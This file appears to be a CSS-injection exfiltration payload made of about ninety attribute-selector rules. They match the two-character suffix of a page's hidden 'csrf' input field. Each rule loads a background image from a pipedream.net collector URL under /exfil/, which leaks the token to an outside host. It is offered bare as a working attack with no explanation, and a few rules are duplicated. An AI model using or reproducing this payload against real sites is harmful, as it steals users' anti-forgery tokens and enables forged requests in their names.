input[name=csrf][value$="af"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/af); }
input[name=csrf][value$="zf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/zf); }
input[name=csrf][value$="ef"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ef); }
input[name=csrf][value$="rf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rf); }
input[name=csrf][value$="tf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/tf); }
input[name=csrf][value$="yf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/yf); }
input[name=csrf][value$="uf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/uf); }
input[name=csrf][value$="if"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/if); }
input[name=csrf][value$="of"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/of); }
input[name=csrf][value$="pf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/pf); }
input[name=csrf][value$="qf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/qf); }
input[name=csrf][value$="sf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/sf); }
input[name=csrf][value$="df"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/df); }
input[name=csrf][value$="ff"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ff); }
input[name=csrf][value$="gf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/gf); }
input[name=csrf][value$="hf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/hf); }
input[name=csrf][value$="jf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/jf); }
input[name=csrf][value$="kf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/kf); }
input[name=csrf][value$="lf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/lf); }
input[name=csrf][value$="mf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/mf); }
input[name=csrf][value$="wf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/wf); }
input[name=csrf][value$="xf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/xf); }
input[name=csrf][value$="cf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/cf); }
input[name=csrf][value$="vf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/vf); }
input[name=csrf][value$="bf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/bf); }
input[name=csrf][value$="nf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/nf); }
input[name=csrf][value$="Af"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Af); }
input[name=csrf][value$="Zf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Zf); }
input[name=csrf][value$="Ef"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Ef); }
input[name=csrf][value$="Rf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Rf); }
input[name=csrf][value$="Tf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Tf); }
input[name=csrf][value$="Yf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Yf); }
input[name=csrf][value$="Uf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Uf); }
input[name=csrf][value$="If"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/If); }
input[name=csrf][value$="Of"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Of); }
input[name=csrf][value$="Pf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Pf); }
input[name=csrf][value$="Qf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Qf); }
input[name=csrf][value$="Sf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Sf); }
input[name=csrf][value$="Df"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Df); }
input[name=csrf][value$="Ff"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Ff); }
input[name=csrf][value$="Gf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Gf); }
input[name=csrf][value$="Hf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Hf); }
input[name=csrf][value$="Jf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Jf); }
input[name=csrf][value$="Kf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Kf); }
input[name=csrf][value$="Lf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Lf); }
input[name=csrf][value$="Mf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Mf); }
input[name=csrf][value$="Wf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Wf); }
input[name=csrf][value$="Xf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Xf); }
input[name=csrf][value$="Cf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Cf); }
input[name=csrf][value$="Vf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Vf); }
input[name=csrf][value$="Bf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Bf); }
input[name=csrf][value$="Nf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/Nf); }
input[name=csrf][value$="0f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/0f); }
input[name=csrf][value$="1f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/1f); }
input[name=csrf][value$="2f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/2f); }
input[name=csrf][value$="3f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/3f); }
input[name=csrf][value$="4f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/4f); }
input[name=csrf][value$="5f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/5f); }
input[name=csrf][value$="6f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/6f); }
input[name=csrf][value$="7f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/7f); }
input[name=csrf][value$="8f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/8f); }
input[name=csrf][value$="9f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/9f); }
input[name=csrf][value$="_f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/_f); }
input[name=csrf][value$="-f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/-f); }
input[name=csrf][value$="éf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/éf); }
input[name=csrf][value$="àf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/àf); }
input[name=csrf][value$="èf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/èf); }
input[name=csrf][value$="ùf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ùf); }
input[name=csrf][value$="çf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/çf); }
input[name=csrf][value$="€f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/€f); }
input[name=csrf][value$="£f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/£f); }
input[name=csrf][value$="?f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/?f); }
input[name=csrf][value$=",f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/,f); }
input[name=csrf][value$=";f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/;f); }
input[name=csrf][value$=":f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/:f); }
input[name=csrf][value$="!f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/!f); }
input[name=csrf][value$="?f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/?f); }
input[name=csrf][value$=".f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/.f); }
input[name=csrf][value$="/f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil//f); }
input[name=csrf][value$="§f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/§f); }
input[name=csrf][value$="$f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/$f); }
input[name=csrf][value$="éf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/éf); }
input[name=csrf][value$="èf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/èf); }
input[name=csrf][value$="&f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/&f); }
input[name=csrf][value$="=f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/=f); }
input[name=csrf][value$="+f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/+f); }
input[name=csrf][value$="<f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/<f); }
input[name=csrf][value$=">f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/>f); }
input[name=csrf][value$="~f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/~f); }
input[name=csrf][value$="#f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/#f); }
input[name=csrf][value$="*f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/*f); }
